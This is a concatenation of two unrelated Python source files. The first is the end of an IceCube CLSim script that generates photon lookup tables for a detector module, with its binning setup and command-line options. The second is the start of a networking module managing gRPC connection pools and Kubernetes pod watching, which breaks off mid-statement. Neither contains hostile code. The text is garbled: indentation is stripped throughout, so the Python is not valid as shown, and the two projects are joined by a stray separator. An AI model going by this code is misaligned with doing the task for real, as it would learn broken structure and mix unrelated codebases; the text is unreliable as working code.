pulseseries = I3CLSimFlasherPulseSeries()
pulse = make_retro_pulse(
x=dom_x,
y=dom_y,
z=dom_z,
zenith=dom_zenith,
azimuth=dom_azimuth,
)
pulseseries.append(pulse)
frame[flasher_pulse_series_name] = pulseseries
frame['ReferenceParticle'] = self.reference_source(
x=dom_x,
y=dom_y,
z=dom_z,
zenith=dom_zenith,
azimuth=dom_azimuth,
scale=1.0,
)
self.PushFrame(frame)
self.emitted_events += 1
if self.emitted_events >= self.n_events:
self.RequestSuspension()
tray.AddModule(
MakeParticle,
source_function=reference_source,
n_events=n_events,
)
header = OrderedDict(FITSTable.empty_header)
header['retro_dom_table'] = 0
header['gcd_i3_md5_{:s}'.format(source_gcd_i3_md5)] = 0
for n, axname in enumerate(binning_kw.keys()):
header['ax_{:s}'.format(axname)] = n
for key, val in binning_kw[axname].items():
header['{}_{}'.format(axname, key)] = val
if axname == 't':
header['t_is_residual_time'] = 1
header['ice_{:s}'.format(ice_model.replace('.', '_'))] = 0
header['angsens_{:s}'.format(angular_sensitivity.replace('.', '_'))] = 0
header['disable_tilt'] = disable_tilt
header['disable_anisotropy'] = disable_anisotropy
header['hash_{:s}'.format(hash_val)] = 0
if tile is not None:
header['tile'] = tile
for key, value in dom_spec.items():
header[key] = value
header['dom_x'] = dom_x
header['dom_y'] = dom_y
header['dom_z'] = dom_z
header['dom_zenith'] = dom_zenith
header['dom_azimuth'] = dom_azimuth
header['seed'] = seed
header['n_events'] = n_events
if hasattr(dataclasses, 'I3ModuleGeo'):
tray.AddModule(
'I3GeometryDecomposer',
name + '_decomposeGeometry',
If=lambda frame: 'I3OMGeoMap' not in frame
)
# at the moment the Geant4 paths need to be set, even if it isn't used
# TODO: fix this
if I3CLSimLightSourceToStepConverterGeant4.can_use_geant4:
AutoSetGeant4Environment()
ppc_converter = I3CLSimLightSourceToStepConverterPPC(photonsPerStep=200)
# Is this even necessary?
ppc_converter.SetUseCascadeExtension(False)
particle_parameterizations = GetDefaultParameterizationList(
ppc_converter,
muonOnly=False,
)
# need a spectrum table in order to pass spectra to OpenCL
spectrum_table = I3CLSimSpectrumTable()
particle_parameterizations += GetFlasherParameterizationList(spectrum_table)
logging.log_debug(
'number of spectra (1x Cherenkov + Nx flasher): %d'
% len(spectrum_table),
unit='clsim',
)
opencl_devices = configureOpenCLDevices(
UseGPUs=False,
UseCPUs=True,
OverrideApproximateNumberOfWorkItems=None,
DoNotParallelize=True,
UseOnlyDeviceNumber=None,
)
medium_properties = parseIceModel(
expandvars('$I3_SRC/ice-models/resources/models/' + ice_model),
disableTilt=disable_tilt,
disableAnisotropy=disable_anisotropy,
)
tray.AddModule(
'I3CLSimTabulatorModule',
name + '_clsim',
MCTreeName='', # doesn't apply since we use pulse series
FlasherPulseSeriesName=flasher_pulse_series_name,
RandomService=random_service,
Area=DOM_SURFACE_AREA,
WavelengthAcceptance=I3CLSimFunctionConstant(1.0), #GetIceCubeDOMAcceptance(domRadius=DOM_RADIUS),
AngularAcceptance=I3CLSimFunctionConstant(1.0),
MediumProperties=medium_properties,
ParameterizationList=particle_parameterizations,
SpectrumTable=spectrum_table,
OpenCLDeviceList=opencl_devices,
PhotonsPerBunch=200,
EntriesPerPhoton=5000,
Filename=tablepath,
RecordErrors=record_errors,
TableHeader=header,
Axes=axes,
SensorNormalize=False
)
unpin_threads()
# TODO: add to CLSim invocation parmeters for detector geometry, bulk ice model, hole
# ice model (i.e. this means angular sensitivity curve in its current implementation,
# though more advanced hole ice models could mean different things), and whether to use
# time difference from direct time
def generate_clsim_table(
outdir,
gcd,
ice_model,
angular_sensitivity,
disable_tilt,
disable_anisotropy,
string,
dom,
n_events,
seed,
coordinate_system,
binning,
tableset_hash=None,
tile=None,
overwrite=False,
compress=False,
):
"""Generate a CLSim table.
See wiki.icecube.wisc.edu/index.php/Ice for information about ice models.
Parameters
----------
outdir : string
gcd : string
ice_model : str
E.g. "spice_mie", "spice_lea", ...
angular_sensitivity : str
E.g. "h2-50cm", "9" (which is equivalent to "new25" because, like, duh)
disable_tilt : bool
Whether to force no layer tilt in simulation (if tilt is present in
bulk ice model; otherwise, this has no effect)
disable_anisotropy : bool
Whether to force no bulk ice anisotropy (if anisotropy is present in
bulk ice model; otherwise, this has no effect)
string : int in [1, 86]
dom : int in [1, 60]
n_events : int > 0
Note that the number of photons is much larger than the number of
events (related to the "brightness" of the defined source).
seed : int in [0, 2**32)
Seed for CLSim's random number generator
coordinate_system : string in {"spherical", "cartesian"}
If spherical, base coordinate system is .. ::
(r, theta, phi, t, costhetadir, (optionally abs)deltaphidir)
If Cartesian, base coordinate system is .. ::
(x, y, z, costhetadir, phidir)
but if any of the coordinate axes are specified to have 0 bins, they
will be omitted (but the overall order is maintained).
binning : mapping
If `coordinate_system` is "spherical", keys should be:
"n_r_bins"
"n_t_bins"
"n_costheta_bins"
"n_phi_bins"
"n_costhetadir_bins"
"n_deltaphidir_bins"
"r_max"
"r_power"
"t_max"
"t_power"
"deltaphidir_power"
If `coordinate_system` is "cartesian", keys should be:
"n_x_bins"
"n_y_bins"
"n_z_bins"
"n_costhetadir_bins"
"n_phidir_bins"
"x_min"
"x_max"
"y_min"
"y_max"
"z_min"
"z_max"
tableset_hash : str, optional
Specify if the table is a tile used to generate a larger table
tile : int >= 0, optional
Specify if the table is a tile used to generate a larger table
overwrite : bool, optional
Whether to overwrite an existing table (default: False)
compress : bool, optional
Whether to pass the resulting table through zstandard compression
(default: True)
Raises
------
ValueError
If `compress` is True but `zstd` command-line utility cannot be found
AssertionError, ValueError
If illegal argument values are passed
ValueError
If `overwrite` is False and a table already exists at the target path
Notes
-----
Binnings are as follows:
* Radial binning is regular in the space of r**(1/r_power), with
`n_r_bins` spanning from 0 to `r_max` meters.
* Time binning is regular in the space of t**(1/t_power), with
`n_t_bins` spanning from 0 to `t_max` nanoseconds.
* Position zenith angle is binned regularly in the cosine of the zenith
angle with `n_costhetadir_bins` spanning from -1 to +1.
* Position azimuth angle is binned regularly, with `n_phi_bins`
spanning from -pi to pi radians.
* Photon directionality zenith angle (relative to IcedCube coordinate
system) is binned regularly in cosine-zenith space, with
`n_costhetadir_bins` spanning from `costhetadir_min` to
`costhetadir_max`
* Photon directionality azimuth angle; sometimes assumed to be
symmetric about line from DOM to the center of the bin, so is binned
as an absolute value, i.e., from 0 to pi radians. Otherwise, binned
from -np.pi to +np.pi
The following are forced upon the above binning specifications (and
remaining parameters are specified as arguments to the function)
* t_min = 0 (ns)
* r_min = 0 (m)
* costheta_min = -1
* costheta_max = 1
* phi_min = -pi (rad)
* phi_max = pi (rad)
* costhetadir_min = -1
* costhetadir_max = 1
* deltaphidir_min = 0 (rad)
* deltaphidir_min = pi (rad)
"""
assert isinstance(n_events, Integral) and n_events > 0
assert isinstance(seed, Integral) and 0 <= seed < 2**32
assert (
(tableset_hash is not None and tile is not None)
or (tableset_hash is None and tile is None)
)
n_bins_per_dim = []
for key, val in binning.items():
if not key.startswith('n_'):
continue
assert isinstance(val, Integral), '{} not an integer'.format(key)
assert val >= 0, '{} must be >= 0'.format(key)
n_bins_per_dim.append(val)
# Note: + 2 accounts for under & overflow bins in each dimension
n_bins = np.product([n + 2 for n in n_bins_per_dim if n > 0])
assert n_bins > 0
#if n_bins > 2**32:
# raise ValueError(
# 'The flattened bin index in CLSim is represented by uint32 which'
# ' has a max of 4 294 967 296, but the binning specified comes to'
# ' {} bins ({} times too many).'
# .format(n_bins, n_bins / 2**32)
# )
ice_model = ice_model.strip()
angular_sensitivity = angular_sensitivity.strip()
# For now, hole ice model is hard-coded in our CLSim branch; see
# clsim/private/clsim/I3CLSimLightSourceToStepConverterFlasher.cxx
# in the branch you're using to check that this is correct
assert angular_sensitivity == 'flasher_p1_0.30_p2_-1'
gcd_info = extract_gcd(gcd)
if compress and not any(access(join(path, 'zstd'), X_OK)
for path in environ['PATH'].split(pathsep)):
raise ValueError('`zstd` command not found in path')
outdir = expand(outdir)
mkdir(outdir)
axes = OrderedDict()
binning_kw = OrderedDict()
# Note that the actual binning in CLSim is performed using float32, so we
# first "truncate" all values to that precision. However, the `LinearAxis`
# function requires Python floats (which are 64 bits), so we have to
# convert all values to to `float` when passing as kwargs to `LinearAxis`
# (and presumably the values will be re-truncated to float32 within the
# CLsim code somewhere). Hopefully following this procedure, the values
# actually used within CLSim are what we want...? CLSim is stupid.
ftype = np.float32
if coordinate_system == 'spherical':
binning['t_min'] = ftype(0) # ns
binning['r_min'] = ftype(0) # meters
costheta_min = ftype(-1.0)
costheta_max = ftype(1.0)
# See
# clsim/resources/kernels/spherical_coordinates.c.cl
# in the branch you're using to check that the following are correct
phi_min = ftype(3.0543261766433716e-01)
phi_max = ftype(6.5886182785034180e+00)
binning['costhetadir_min'] = ftype(-1.0)
binning['costhetadir_max'] = ftype(1.0)
binning['deltaphidir_min'] = ftype(-3.1808626651763916e+00)
binning['deltaphidir_max'] = ftype(3.1023228168487549e+00)
if binning['n_r_bins'] > 0:
assert isinstance(binning['r_power'], Integral) and binning['r_power'] > 0
r_binning_kw = OrderedDict([
('min', float(binning['r_min'])),
('max', float(binning['r_max'])),
('n_bins', int(binning['n_r_bins'])),
])
if binning['r_power'] == 1:
axes['r'] = LinearAxis(**r_binning_kw)
else:
r_binning_kw['power'] = int(binning['r_power'])
axes['r'] = PowerAxis(**r_binning_kw)
binning_kw['r'] = r_binning_kw
if binning['n_costheta_bins'] > 0:
costheta_binning_kw = OrderedDict([
('min', float(costheta_min)),
('max', float(costheta_max)),
('n_bins', int(binning['n_costheta_bins'])),
])
axes['costheta'] = LinearAxis(**costheta_binning_kw)
binning_kw['costheta'] = costheta_binning_kw
if binning['n_phi_bins'] > 0:
phi_binning_kw = OrderedDict([
('min', float(phi_min)),
('max', float(phi_max)),
('n_bins', int(binning['n_phi_bins'])),
])
axes['phi'] = LinearAxis(**phi_binning_kw)
binning_kw['phi'] = phi_binning_kw
if binning['n_t_bins'] > 0:
assert isinstance(binning['t_power'], Integral) and binning['t_power'] > 0
t_binning_kw = OrderedDict([
('min', float(binning['t_min'])),
('max', float(binning['t_max'])),
('n_bins', int(binning['n_t_bins'])),
])
if binning['t_power'] == 1:
axes['t'] = LinearAxis(**t_binning_kw)
else:
t_binning_kw['power'] = int(binning['t_power'])
axes['t'] = PowerAxis(**t_binning_kw)
binning_kw['t'] = t_binning_kw
if binning['n_costhetadir_bins'] > 0:
costhetadir_binning_kw = OrderedDict([
('min', float(binning['costhetadir_min'])),
('max', float(binning['costhetadir_max'])),
('n_bins', int(binning['n_costhetadir_bins'])),
])
axes['costhetadir'] = LinearAxis(**costhetadir_binning_kw)
binning_kw['costhetadir'] = costhetadir_binning_kw
if binning['n_deltaphidir_bins'] > 0:
assert (
isinstance(binning['deltaphidir_power'], Integral)
and binning['deltaphidir_power'] > 0
)
deltaphidir_binning_kw = OrderedDict([
('min', float(binning['deltaphidir_min'])),
('max', float(binning['deltaphidir_max'])),
('n_bins', int(binning['n_deltaphidir_bins'])),
])
if binning['deltaphidir_power'] == 1:
axes['deltaphidir'] = LinearAxis(**deltaphidir_binning_kw)
else:
deltaphidir_binning_kw['power'] = int(binning['deltaphidir_power'])
axes['deltaphidir'] = PowerAxis(**deltaphidir_binning_kw)
binning_kw['deltaphidir'] = deltaphidir_binning_kw
elif coordinate_system == 'cartesian':
binning['t_min'] = ftype(0) # ns
binning['costhetadir_min'], binning['costhetadir_max'] = ftype(-1.0), ftype(1.0)
binning['phidir_min'], binning['phidir_max'] = ftype(-np.pi), ftype(np.pi) # rad
if binning['n_x_bins'] > 0:
x_binning_kw = OrderedDict([
('min', float(binning['x_min'])),
('max', float(binning['x_max'])),
('n_bins', int(binning['n_x_bins'])),
])
axes['x'] = LinearAxis(**x_binning_kw)
binning_kw['x'] = x_binning_kw
if binning['n_y_bins'] > 0:
y_binning_kw = OrderedDict([
('min', float(binning['y_min'])),
('max', float(binning['y_max'])),
('n_bins', int(binning['n_y_bins'])),
])
axes['y'] = LinearAxis(**y_binning_kw)
binning_kw['y'] = y_binning_kw
if binning['n_z_bins'] > 0:
z_binning_kw = OrderedDict([
('min', float(binning['z_min'])),
('max', float(binning['z_max'])),
('n_bins', int(binning['n_z_bins'])),
])
axes['z'] = LinearAxis(**z_binning_kw)
binning_kw['z'] = z_binning_kw
if binning['n_t_bins'] > 0:
assert isinstance(binning['t_power'], Integral) and binning['t_power'] > 0
t_binning_kw = OrderedDict([
('min', float(binning['t_min'])),
('max', float(binning['t_max'])),
('n_bins', int(binning['n_t_bins'])),
])
if binning['t_power'] == 1:
axes['t'] = LinearAxis(**t_binning_kw)
else:
t_binning_kw['power'] = int(binning['t_power'])
axes['t'] = PowerAxis(**t_binning_kw)
binning_kw['t'] = t_binning_kw
if binning['n_costhetadir_bins'] > 0:
costhetadir_binning_kw = OrderedDict([
('min', float(binning['costhetadir_min'])),
('max', float(binning['costhetadir_max'])),
('n_bins', int(binning['n_costhetadir_bins'])),
])
axes['costhetadir'] = LinearAxis(**costhetadir_binning_kw)
binning_kw['costhetadir'] = costhetadir_binning_kw
if binning['n_phidir_bins'] > 0:
phidir_binning_kw = OrderedDict([
('min', float(binning['phidir_min'])),
('max', float(binning['phidir_max'])),
('n_bins', int(binning['n_phidir_bins'])),
])
axes['phidir'] = LinearAxis(**phidir_binning_kw)
binning_kw['phidir'] = phidir_binning_kw
binning_order = BINNING_ORDER[coordinate_system]
missing_dims = set(axes.keys()).difference(binning_order)
if missing_dims:
raise ValueError(
'`binning_order` specified is {} but is missing dimension(s) {}'
.format(binning_order, missing_dims)
)
axes_ = OrderedDict()
binning_kw_ = OrderedDict()
for dim in binning_order:
if dim in axes:
axes_[dim] = axes[dim]
binning_kw_[dim] = binning_kw[dim]
axes = axes_
binning_kw = binning_kw_
# NOTE: use SphericalAxes even if we're actually binning Cartesian since we
# don't care how it handles e.g. volumes, and Cartesian isn't implemented
# in CLSim yet
axes = SphericalAxes(axes.values())
# Construct metadata initially with items that will be hashed
metadata = OrderedDict([
('source_gcd_i3_md5', gcd_info['source_gcd_i3_md5']),
('coordinate_system', coordinate_system),
('binning_kw', binning_kw),
('ice_model', ice_model),
('angular_sensitivity', angular_sensitivity),
('disable_tilt', disable_tilt),
('disable_anisotropy', disable_anisotropy)
])
# TODO: this is hard-coded in our branch of CLSim; make parameter & fix here!
if 't' in binning:
metadata['t_is_residual_time'] = True
if tableset_hash is None:
hash_val = hash_obj(metadata, fmt='hex')[:8]
print('derived hash:', hash_val)
else:
hash_val = tableset_hash
print('tableset_hash:', hash_val)
metadata['hash_val'] = hash_val
if tile is not None:
metadata['tile'] = tile
dom_spec = OrderedDict([('string', string), ('dom', dom)])
if 'depth_idx' in dom_spec and ('subdet' in dom_spec or 'string' in dom_spec):
if 'subdet' in dom_spec:
dom_spec['string'] = dom_spec.pop('subdet')
string = dom_spec['string']
depth_idx = dom_spec['depth_idx']
if isinstance(string, str):
subdet = dom_spec['subdet'].lower()
dom_x, dom_y = 0, 0
ic_avg_z, dc_avg_z = get_average_dom_z_coords(gcd_info['geo'])
if string == 'ic':
dom_z = ic_avg_z[depth_idx]
elif string == 'dc':
dom_z = dc_avg_z[depth_idx]
else:
raise ValueError('Unrecognized subdetector {}'.format(subdet))
else:
dom_x, dom_y, dom_z = gcd_info['geo'][string - 1, depth_idx]
metadata['string'] = string
metadata['depth_idx'] = depth_idx
if tile is not None:
raise ValueError(
'Cannot produce tiled tables using "depth_idx"-style table groupings;'
' use "string"/"dom"-style tables instead.'
)
clsim_table_fname_proto = CLSIM_TABLE_FNAME_PROTO[1]
clsim_table_metaname_proto = CLSIM_TABLE_METANAME_PROTO[0]
print('Subdetector {}, depth index {} (z_avg = {} m)'
.format(subdet, depth_idx, dom_z))
elif 'string' in dom_spec and 'dom' in dom_spec:
string = dom_spec['string']
dom = dom_spec['dom']
dom_x, dom_y, dom_z = gcd_info['geo'][string - 1, dom - 1]
metadata['string'] = string
metadata['dom'] = dom
if tile is None:
clsim_table_fname_proto = CLSIM_TABLE_FNAME_PROTO[2]
clsim_table_metaname_proto = CLSIM_TABLE_METANAME_PROTO[1]
else:
clsim_table_fname_proto = CLSIM_TABLE_TILE_FNAME_PROTO[-1]
clsim_table_metaname_proto = CLSIM_TABLE_TILE_METANAME_PROTO[-1]
print('GCD = "{}"\nString {}, dom {}: (x, y, z) = ({}, {}, {}) m'
.format(gcd, string, dom, dom_x, dom_y, dom_z))
else:
raise ValueError('Cannot understand `dom_spec` {}'.format(dom_spec))
# Until someone figures out DOM tilt and ice column / bubble column / cable
# orientations for sure, we'll just set DOM orientation to zenith=pi,
# azimuth=0.
dom_zenith = np.pi
dom_azimuth = 0.0
# Now add other metadata items that are useful but not used for hashing
metadata['dom_x'] = dom_x
metadata['dom_y'] = dom_y
metadata['dom_z'] = dom_z
metadata['dom_zenith'] = dom_zenith
metadata['dom_azimuth'] = dom_azimuth
metadata['seed'] = seed
metadata['n_events'] = n_events
metapath = join(outdir, clsim_table_metaname_proto.format(**metadata))
tablepath = join(outdir, clsim_table_fname_proto.format(**metadata))
# Save metadata as a JSON file (so it's human-readable by any tool, not
# just Python--in contrast to e.g. pickle files)
json.dump(metadata, file(metapath, 'w'), sort_keys=False, indent=4)
print('='*80)
print('Metadata for the table set was written to\n "{}"'.format(metapath))
print('Table will be written to\n "{}"'.format(tablepath))
print('='*80)
exists_at = []
for fpath in [tablepath, tablepath + '.zst']:
if isfile(fpath):
exists_at.append(fpath)
if exists_at:
names = ', '.join('"{}"'.format(fp) for fp in exists_at)
if overwrite:
print('WARNING! Deleting existing table(s) at ' + names)
for fpath in exists_at:
remove(fpath)
else:
raise ValueError('Table(s) already exist at {}; not'
' overwriting.'.format(names))
print('')
tray = I3Tray()
tray.AddSegment(
TabulateRetroSources,
'TabulateRetroSources',
source_gcd_i3_md5=gcd_info['source_gcd_i3_md5'],
binning_kw=binning_kw,
axes=axes,
ice_model=ice_model,
angular_sensitivity=angular_sensitivity,
disable_tilt=disable_tilt,
disable_anisotropy=disable_anisotropy,
hash_val=hash_val,
dom_spec=dom_spec,
dom_x=dom_x,
dom_y=dom_y,
dom_z=dom_z,
dom_zenith=dom_zenith,
dom_azimuth=dom_azimuth,
seed=seed,
n_events=n_events,
tablepath=tablepath,
tile=tile,
record_errors=False,
)
logging.set_level_for_unit('I3CLSimStepToTableConverter', 'TRACE')
logging.set_level_for_unit('I3CLSimTabulatorModule', 'DEBUG')
logging.set_level_for_unit('I3CLSimLightSourceToStepConverterGeant4', 'TRACE')
logging.set_level_for_unit('I3CLSimLightSourceToStepConverterFlasher', 'TRACE')
tray.Execute()
tray.Finish()
if compress:
print('Compressing table with zstandard via command line')
print(' zstd -1 --rm "{}"'.format(tablepath))
subprocess.check_call(['zstd', '-1', '--rm', tablepath])
print('done.')
def parse_args(description=__doc__):
"""Parese command line args.
Returns
-------
args : Namespace
"""
parser = ArgumentParser(description=description)
parser.add_argument(
'--outdir', required=True,
help='Save table to this directory (default: "./")'
)
parser.add_argument(
'--overwrite', action='store_true',
help='Overwrite if the table already exists'
)
parser.add_argument(
'--compress', action='store_true',
help='Compress the table with zstd when complete'
)
parser.add_argument(
'--gcd', required=True
)
parser.add_argument(
'--ice-model', required=True
)
parser.add_argument(
'--angular-sensitivity', required=True
)
parser.add_argument(
'--disable-tilt', action='store_true',
help='Force no tilt, even if ice model contains tilt'
)
parser.add_argument(
'--disable-anisotropy', action='store_true',
help='Force no anisotropy, even if ice model contains anisotropy'
)
parser.add_argument(
'--string', type=int, required=True,
help='String number in [1, 86]'
)
parser.add_argument(
'--dom', type=int, required=True,
help='''DOM number on string, in [1, 60]'''
)
parser.add_argument(
'--n-events', type=int, required=True,
help='Number of events to simulate'
)
parser.add_argument(
'--seed', type=int, required=True,
help='Random seed to use, in range of 32 bit uint: [0, 2**32-1]'
)
subparsers = parser.add_subparsers(
dest='coordinate_system',
help='''Choose the coordinate system for binning: "spherical" or
"cartesian"'''
)
# -- Spherical (phi optional) + time + directionality binning -- #
sph_parser = subparsers.add_parser(
'spherical',
help='Use spherical binning about the DOM',
)
sph_parser.add_argument(
'--n-r-bins', type=int, required=True,
help='Number of radial bins'
)
sph_parser.add_argument(
'--n-costheta-bins', type=int, required=True,
help='Number of costheta (cosine of position zenith angle) bins'
)
sph_parser.add_argument(
'--n-phi-bins', type=int, required=True,
help='Number of phi (position azimuth) bins'
)
sph_parser.add_argument(
'--n-t-bins', type=int, required=True,
help='Number of time bins (relative to direct time)'
)
sph_parser.add_argument(
'--n-costhetadir-bins', type=int, required=True,
help='Number of costhetadir bins'
)
sph_parser.add_argument(
'--n-deltaphidir-bins', type=int, required=True,
help='''Number of deltaphidir bins (Note: span from 0 to pi; code
assumes symmetry about 0)'''
)
sph_parser.add_argument(
'--r-max', type=float, required=False,
help='Radial binning maximum value, in meters'
)
sph_parser.add_argument(
'--r-power', type=int, required=False,
help='Radial binning is regular in raidus to this power'
)
sph_parser.add_argument(
'--deltaphidir-power', type=int, required=False,
help='deltaphidir binning is regular in deltaphidir to this power'
)
sph_parser.add_argument(
'--t-max', type=float, required=False,
help='Time binning maximum value, in nanoseconds'
)
sph_parser.add_argument(
'--t-power', type=int, required=False,
help='Time binning is regular in time to this power'
)
# -- Cartesian + (optional time) + directionality binning -- #
cart_parser = subparsers.add_parser(
'cartesian',
help='Use Cartesian binning in IceCube coord system',
)
cart_parser.add_argument(
'--tableset-hash', required=False,
help='''Hash for a larger table(set) of which this is one tile (i.e.,
if --tile is provided)'''
)
cart_parser.add_argument(
'--tile', type=int, required=False,
help='Tile number; provide if this is a tile in a larger table'
)
cart_parser.add_argument(
'--n-x-bins', type=int, required=True,
help='Number of x bins'
)
cart_parser.add_argument(
'--n-y-bins', type=int, required=True,
help='Number of y bins'
)
cart_parser.add_argument(
'--n-z-bins', type=int, required=True,
help='Number of z bins'
)
cart_parser.add_argument(
'--n-t-bins', type=int, required=True,
help='Number of time bins (relative to direct time)'
)
cart_parser.add_argument(
'--n-costhetadir-bins', type=int, required=True,
help='Number of costhetadir bins'
)
cart_parser.add_argument(
'--n-phidir-bins', type=int, required=True,
help='''Number of phidir bins (Note: span from -pi to pi)'''
)
# -- Binning limits -- #
cart_parser.add_argument(
'--x-min', type=float, required=False,
help='x binning minimum value, IceCube coordinate system, in meters'
)
cart_parser.add_argument(
'--x-max', type=float, required=False,
help='x binning maximum value, IceCube coordinate system, in meters'
)
cart_parser.add_argument(
'--y-min', type=float, required=False,
help='y binning minimum value, IceCube coordinate system, in meters'
)
cart_parser.add_argument(
'--y-max', type=float, required=False,
help='y binning maximum value, IceCube coordinate system, in meters'
)
cart_parser.add_argument(
'--z-min', type=float, required=False,
help='z binning minimum value, IceCube coordinate system, in meters'
)
cart_parser.add_argument(
'--z-max', type=float, required=False,
help='z binning maximum value, IceCube coordinate system, in meters'
)
cart_parser.add_argument(
'--t-max', type=float, required=False,
help='Time binning maximum value, in nanoseconds'
)
cart_parser.add_argument(
'--t-power', type=int, required=False,
help='Time binning is regular in time to this power'
)
all_kw = vars(parser.parse_args())
general_kw = OrderedDict()
for key in (
'outdir',
'overwrite',
'compress',
'gcd',
'ice_model',
'angular_sensitivity',
'disable_tilt',
'disable_anisotropy',
'string',
'dom',
'n_events',
'seed',
'coordinate_system',
'tableset_hash',
'tile',
):
if key in all_kw:
general_kw[key] = all_kw.pop(key)
binning = all_kw
return general_kw, binning
if __name__ == '__main__':
_general_kw, _binning = parse_args()
generate_clsim_table(binning=_binning, **_general_kw)
|
networking.py | import ast
import asyncio
import ipaddress
import socket
from abc import abstractmethod
from argparse import Namespace
from threading import Thread
from typing import Optional, TYPE_CHECKING
import grpc
from jina.logging.logger import JinaLogger
from jina.proto import jina_pb2_grpc
from jina.types.message import Message
from .. import __default_host__, __docker_host__
from ..helper import get_public_ip, get_internal_ip, get_or_reuse_loop
if TYPE_CHECKING:
import kubernetes
class ConnectionList:
"""
Maintains a list of connections and uses round roubin for selecting a connection
:param port: port to use for the connections
"""
def __init__(self, port: int):
self.port = port
self._connections = []
self._address_to_connection_idx = {}
self._rr_counter = 0
def add_connection(self, address: str, connection):
"""
Add connection with ip to the connection list
:param address: Target address of this connection
:param connection: The connection to add
"""
if address not in self._address_to_connection_idx:
self._address_to_connection_idx[address] = len(self._connections)
self._connections.append(connection)
def remove_connection(self, address: str):
"""
Remove connection with ip from the connection list
:param address: Remove connection for this address
:returns: The removed connection or None if there was not any for the given ip
"""
if address in self._address_to_connection_idx:
self._rr_counter = (
self._rr_counter % (len(self._connections) - 1)
if (len(self._connections) - 1)
else 0
)
return self._connections.pop(self._address_to_connection_idx.pop(address))
return None
def get_next_connection(self):
"""
Returns a connection from the list. Strategy is round robin
:returns: A connection from the pool
"""
try:
connection = self._connections[self._rr_counter]
except IndexError:
# This can happen as a race condition while removing connections
self._rr_counter = 0
connection = self._connections[self._rr_counter]
self._rr_counter = (self._rr_counter + 1) % len(self._connections)
return connection
def pop_connection(self):
"""
Removes and returns a connection from the list. Strategy is round robin
:returns: The connection removed from the pool
"""
if self._connections:
connection = self._connections.pop(self._rr_counter)
self._rr_counter = (
(self._rr_counter + 1) % len(self._connections)
if len(self._connections)
else 0
)
return connection
else:
return None
def has_connection(self, address: str) -> bool:
"""
Checks if a connection for ip exists in the list
:param address: The address to check
:returns: True if a connection for the ip exists in the list
"""
return address in self._address_to_connection_idx
class ConnectionPool:
"""
Manages a list of connections.
:param logger: the logger to use
:param on_demand_connection: Flag to indicate if connections should be created on demand
"""
def __init__(self, logger: Optional[JinaLogger] = None, on_demand_connection=True):
self._connections = {}
self._on_demand_connection = on_demand_connection
self._logger = logger or JinaLogger(self.__class__.__name__)
def send_message(self, msg: Message, target_address: str):
"""Send msg to target_address via one of the pooled connections
:param msg: message to send
:param target_address: address to send to, should include the port like 1.1.1.1:53
:return: result of the actual send method
"""
if target_address in self._connections:
pooled_connection = self._connections[target_address].get_next_connection()
return self._send_message(msg, pooled_connection)
elif self._on_demand_connection:
# If the pool is disabled and an unknown connection is requested: create it
connection_pool = self._create_connection_pool(target_address)
return self._send_message(msg, connection_pool.get_next_connection())
else:
raise ValueError(f'Unknown address {target_address}')
def _create_connection_pool(self, target_address):
port = target_address[target_address.rfind(':') + 1 :]
connection_pool = ConnectionList(port=port)
connection_pool.add_connection(
target_address, self._create_connection(target=target_address)
)
self._connections[target_address] = connection_pool
return connection_pool
def start(self):
"""
Starts the connection pool
"""
pass
def close(self):
"""
Closes the connection pool
"""
self._connections.clear()
@abstractmethod
def _send_message(self, msg: Message, connection):
...
@abstractmethod
def _create_connection(self, target):
...
class GrpcConnectionPool(ConnectionPool):
"""
GrpcConnectionPool which uses gRPC as the communication mechanism
"""
def _send_message(self, msg: Message, connection):
# this wraps the awaitable object from grpc as a coroutine so it can be used as a task
# the grpc call function is not a coroutine but some _AioCall
async def task_wrapper(new_message, stub):
await stub.Call(new_message)
return asyncio.create_task(task_wrapper(msg, connection))
def _create_connection(self, target):
self._logger.debug(f'create connection to {target}')
channel = grpc.aio.insecure_channel(
target,
options=[
('grpc.max_send_message_length', -1),
('grpc.max_receive_message_length', -1),
],
)
return jina_pb2_grpc.JinaDataRequestRPCStub(channel)
class K8sGrpcConnectionPool(GrpcConnectionPool):
"""
Manages grpc connections to replicas in a K8s deployment.
:param namespace: K8s namespace to operate in
:param client: K8s client
:param logger: the logger to use
"""
def __init__(
self,
namespace: str,
client: 'kubernetes.client.CoreV1Api',
logger: JinaLogger = None,
):
super().__init__(logger=logger, on_demand_connection=False)
self._namespace = namespace
self._deployment_clusteraddresses = {}
self._k8s_client = client
self._k8s_event_queue = asyncio.Queue()
self.enabled = False
self._fetch_initial_state()
from kubernetes import watch
self._api_watch = watch.Watch()
self.update_thread = Thread(target=self.run, daemon=True)
def _fetch_initial_state(self):
namespaced_pods = self._k8s_client.list_namespaced_pod(self._namespace)
for item in namespaced_pods.items:
self._process_item(item)
def start(self):
"""
Subscribe to the K8s API and watch for changes in Pods
"""
self._loop = get_or_reuse_loop()
self._process_events_task = asyncio.create_task(self._process_events())
self.update_thread.start()
async def _process_events(self):
while self.enabled:
event = await self._k8s_event_queue.get()
self._process_item(event)
def run(self):
"""
Subscribes on MODIFIED events from list_namespaced_pod AK8s PI
"""
self.enabled = True
while self.enabled:
for event in self._api_watch.stream(
self._k8s_client.list_namespaced_pod, self._namespace
):
if event['type'] == 'MODIFIED':
asyncio.run_coroutine_threadsafe(
self._k8s_event_queue.put(event['object']), self._loop
)
if not self.enabled:
break
def close(self):
"""
Closes the connection pool
"""
self.enabled = False
self._process_events_task.cancel()
self._api_watch.stop()
super().close()
def send_message(self, msg: Message, target_address: str):
"""
Send msg to target_address via one of the pooled connections.
:param msg: message to send
:param target_address: address to send to, should include the port like 1.1.1.1:53
:return: result of the actual send method
"""
host, port = target_address.split(':')
# host can be a domain instead of IP Address, resolve it to IP Address
return super().send_message(msg, f'{socket.gethostbyname(host)}:{port}')
@staticmethod
def _pod_is_up(item):
return item.status.pod_ip is not None and item.status.phase == 'Running'
@staticmethod
def _pod_is_ready(item):
return item.status.container_statuses is not None and all(
cs.ready for cs in item.status.container_statuses
)
def _process_item(self, item):
deployment_name = item.metadata.labels["app"]
is_deleted = item.metadata.deletion_timestamp is not None
if not is_deleted and self._pod_is_up(item) and self._pod_is_ready(item):
if deployment_name in self._deployment_clusteraddresses:
self._add_pod_connection(deployment_name, item)
else:
cluster_ip, port = self._find_cluster_ip(deployment_name)
if cluster_ip:
self._deployment_clusteraddresses[
deployment_name
] = f'{cluster_ip}:{port}'
self._connections[f'{cluster_ip}:{port}'] = ConnectionList(port)
self._add_pod_connection(deployment_name, item)
else:
self._logger.debug(
f'Observed state change in unknown deployment {deployment_name}'
)
elif (
